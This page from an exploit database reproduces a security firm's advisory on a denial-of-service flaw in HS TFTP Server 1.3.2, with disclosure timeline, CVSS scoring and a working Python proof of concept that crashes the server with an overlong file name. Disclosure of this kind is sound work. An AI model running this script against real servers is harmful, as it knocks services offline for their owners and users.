[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Hillstone Software HS TFTP Server Denial Of Service Vulnerability

Author
secpod
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17227
Category
dos / poc
Date add
02-12-2011
Platform
windows
##############################################################################
# Title     : Hillstone Software HS TFTP Server Denial Of Service Vulnerability
# Author    : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.hillstone-software.com/hs_tftp_details.htm
# Advisory  : http://secpod.org/blog/?p=419
#             http://secpod.org/advisories/SecPod_Hillstone_Software_HS_TFTP_Server_DoS.txt
#             http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py
# Version   : Hillstone Software HS TFTP 1.3.2
# Date      : 02/12/2011
##############################################################################
 
SecPod ID: 1031                 21/09/2011 Issue Discovered
                        04/10/2011 Vendor Notified
                        No Response from Vendor
                        02/12/2011 Advisory Released
 
 
Class: Denial Of Service                Severity: Medium
 
 
Overview:
---------
Hillstone Software HS TFTP Server version 1.3.2 is prone to a denial of
service vulnerability.
 
 
Technical Description:
----------------------
The vulnerability is caused due to improper validation of WRITE/READ Request
Parameter containing long file name, which allows remote attackers to crash
the service.
 
 
Impact:
--------
Successful exploitation could allow an attacker to cause denial of service
condition.
 
 
Affected Software:
------------------
Hillstone Software HS TFTP 1.3.2
 
 
Tested on:
-----------
Hillstone Software HS TFTP 1.3.2 on Windows XP SP3 & Win 7.
Older versions might be affected.
 
 
References:
-----------
http://secpod.org/blog/?p=419
http://www.hillstone-software.com/index.htm
http://www.hillstone-software.com/hs_tftp_details.htm
http://secpod.org/advisories/SecPod_Hillstone_Software_HS_TFTP_Server_DoS.txt
http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py
 
 
Proof of Concept:
----------------
http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py
 
 
Solution:
----------
Not available
 
 
Risk Factor:
-------------
    CVSS Score Report:
        ACCESS_VECTOR          = NETWORK
        ACCESS_COMPLEXITY      = LOW
        AUTHENTICATION         = NOT_REQUIRED
        CONFIDENTIALITY_IMPACT = NONE
        INTEGRITY_IMPACT       = NONE
        AVAILABILITY_IMPACT    = PARTIAL
        EXPLOITABILITY         = PROOF_OF_CONCEPT
        REMEDIATION_LEVEL      = UNAVAILABLE
        REPORT_CONFIDENCE      = CONFIRMED
        CVSS Base Score        = 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
        Risk factor            = Medium
 
 
POC :
======
 
import socket,sys,time
 
port   = 69
target = raw_input("Enter host/target ip address: ")
 
if not target:
    print "Host/Target IP Address is not specified"
    sys.exit(1)
 
print "you entered ", target
 
try:
    socket.inet_aton(target)
except socket.error:
    print "Invalid IP address found ..."
    sys.exit(1)
 
try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    print "socket() failed"
    sys.exit(1)
 
## File name >= 222 length leads to crash
exploit = "\x90" * 2222
 
mode = "binary"
print "File name WRITE/READ crash"
 
## WRITE command = \x00\x02
data = "\x00\x02" + exploit + "\0" + mode + "\0"
 
## READ command = \x00\x01
## data = "\x00\x01" + exploit + "\0" + mode + "\0"
 
sock.sendto(data, (target, port))
time.sleep(2)
sock.close()
try:
    sock.connect()
except:
    print "Remote TFTP server port is down..."
    sys.exit(1)



#  0day.today [2024-12-24]  #